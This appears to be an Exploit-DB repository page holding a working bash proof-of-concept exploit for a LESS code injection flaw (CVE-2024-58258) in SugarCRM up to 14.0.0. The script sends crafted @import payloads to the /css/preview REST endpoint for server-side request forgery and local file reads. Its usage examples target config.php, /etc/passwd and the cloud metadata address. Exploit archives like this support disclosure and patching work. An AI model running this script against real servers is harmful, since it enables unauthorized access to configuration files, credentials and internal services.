08e51ef2f9
12 changes to exploits/shellcodes/ghdb TOTOLINK N300RB 8.54 - Command Execution MikroTik RouterOS 7.19.1 - Reflected XSS Langflow 1.2.x - Remote Code Execution (RCE) PivotX 3.0.0 RC3 - Remote Code Execution (RCE) SugarCRM 14.0.0 - SSRF/Code Injection White Star Software Protop 4.4.2-2024-11-27 - Local File Inclusion (LFI) WP Publications WordPress Plugin 1.2 - Stored XSS NodeJS 24.x - Path Traversal Keras 2.15 - Remote Code Execution (RCE) Microsoft Brokering File System Windows 11 Version 22H2 - Elevation of Privilege Microsoft Graphics Component Windows 11 Pro (Build 26100+) - Local Elevation of Privileges Microsoft Outlook - Remote Code Execution (RCE)
56 lines
No EOL
2.1 KiB
Text
56 lines
No EOL
2.1 KiB
Text
# Exploit Title : SugarCRM 14.0.0 - SSRF/Code Injection
|
|
# Author: Egidio Romano aka EgiX
|
|
# Email : n0b0d13s@gmail.com
|
|
|
|
# Software Link: https://www.sugarcrm.com
|
|
# Affected Versions: All commercial versions before 13.0.4 and 14.0.1.
|
|
# CVE Reference: CVE-2024-58258
|
|
# Vulnerability Description:
|
|
|
|
User input passed through GET parameters to the /css/preview REST API
|
|
endpoint is not properly sanitized before parsing it as LESS code. This can
|
|
be exploited by remote, unauthenticated attackers to inject and execute
|
|
arbitrary LESS directives. By abusing the @import LESS statement, an
|
|
attacker can trigger Server-Side Request Forgery (SSRF) or read arbitrary
|
|
local files on the web server, potentially leading to the disclosure of
|
|
sensitive information.
|
|
|
|
# Proof of Concept:
|
|
|
|
#!/bin/bash
|
|
|
|
echo
|
|
echo "+----------------------------------------------------------------------+";
|
|
echo "| SugarCRM <= 14.0.0 (css/preview) LESS Code Injection Exploit by EgiX |";
|
|
echo "+----------------------------------------------------------------------+";
|
|
|
|
if [ "$#" -ne 2 ]; then
|
|
echo -ne "\nUsage.....: $0 <SugarCRM URL> <Local File or SSRF URL>\n"
|
|
echo -ne "\nExample...: $0 'http://localhost/sugarcrm/' 'config.php'"
|
|
echo -ne "\nExample...: $0 'http://localhost/sugarcrm/' '/etc/passwd'"
|
|
echo -ne "\nExample...: $0 'https://www.sugarcrm.com/' 'http://localhost:9200/_search'"
|
|
echo -ne "\nExample...: $0 'https://www.sugarcrm.com/' 'http://169.254.169.254/latest/meta-data/'\n\n"
|
|
exit 1
|
|
fi
|
|
|
|
urlencode() {
|
|
echo -n "$1" | xxd -p | tr -d '\n' | sed 's/../%&/g'
|
|
}
|
|
|
|
INJECTION=$(urlencode "1; @import (inline) '$2'; @import (inline) 'data:text/plain,________';//")
|
|
RESPONSE=$(curl -ks "${1}rest/v10/css/preview?baseUrl=1¶m=${INJECTION}")
|
|
|
|
if echo "$RESPONSE" | grep -q "________"; then
|
|
echo -e "\nOutput for '$2':\n"
|
|
echo "$RESPONSE" | sed '/________/q' | grep -v '________'
|
|
echo
|
|
else
|
|
echo -e "\nError: exploit failed!\n"
|
|
exit 2
|
|
fi
|
|
|
|
|
|
|
|
# Credits: Vulnerability discovered by Egidio Romano.
|
|
# Original Advisory: http://karmainsecurity.com/KIS-2025-04
|
|
# Other References: https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/ |